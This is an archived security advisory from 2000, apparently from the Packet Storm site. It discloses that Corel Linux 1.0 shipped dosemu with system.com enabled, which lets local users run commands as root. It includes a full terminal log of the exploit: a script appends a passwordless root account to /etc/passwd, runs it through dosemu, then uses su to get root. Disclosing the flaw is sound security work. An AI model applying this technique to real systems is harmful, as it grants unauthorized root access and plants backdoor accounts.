what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

008.txt

008.txt
Posted Feb 25, 2000
Authored by Suid | Site suid.kg

SUID Advisory #8 - Corel Linux 1.0 dosemu distribution configuration. Local users can take advantage of a packaging and configuration error (which has been known and documented for a long time) to execute arbitrary commands as root. Exploit description included.

tags | arbitrary, local, root
systems | linux
SHA-256 | 96c2147114c2083d447c403b05ebe76f0fce1a1dd0a956feda12721668e91518

008.txt

Change Mirror Download
suid@suid.kg - Corel Linux dosemu config error. Local root compromise.

Software: Corel Linux 1.0 dosemu distribution configuration
URL: https://linux.corel.com
Version: Version 1.0
Platforms: Corel Linux only.
Type: Default misconfiguration. Noone reads README anymore??

Summary:

Local users can take advantage of a packaging and configuration
error (which has been known and documented for a long time) to
execute arbitrary commands as root.

We see from the doc/README/SECURITY file as well as
https://www.dosemu.org/docs/README/0.98/README-3.html
written in 1997 that this configuration is bad.

Vulnerability:

The system.com command is available to any user who runs the
dos emulator. This is a direct violation of the advice from
the SECURITY readme file:

Never allow the 'system.com' command (part of dosemu)
to be executed. It makes dosemu
execute the libc 'system() function'. Though privileges
are turned off, the process inherits the
switched uid-setting (uid=root, euid=user), hence the
unix process can use setreuid to gain root
access back. ... the rest you can imagine your self.

Exploit:

This is a script log which details how to reproduce this:


Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PATH:."
nebula:~$ dos
CPU speed set to 430/1 MHz
Running on CPU=586, FPU=1, rdtsc=1

[ snip bunch of dosemu crap ]

"Welcome to dosemu 0.98!
C:\> system hack-corel;
sh: : command not found
C:\> exitERROR: general protection at 0x3f0ff: 0
ERROR: SIGSEGV, protected insn...exiting!

nebula:~$ tail -1 /etc/passwd
owned::0:0::/:/bin/bash
nebula:~$ su owned
nebula:/home/suid# id
uid=0(root) gid=0(root) groups=0(root)
nebula:/home/suid# exit
exit
nebula:~$ exit

Script done on Fri Feb 25 13:55:27 2000

Note:
This is not a vulnerability in dosemu itself. The documentation
warns users very specifically that this will happen if the system
is configured as such.

Greets:

duke
cr
active

https://www.suid.edu/advisories/008.txt

EOF

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close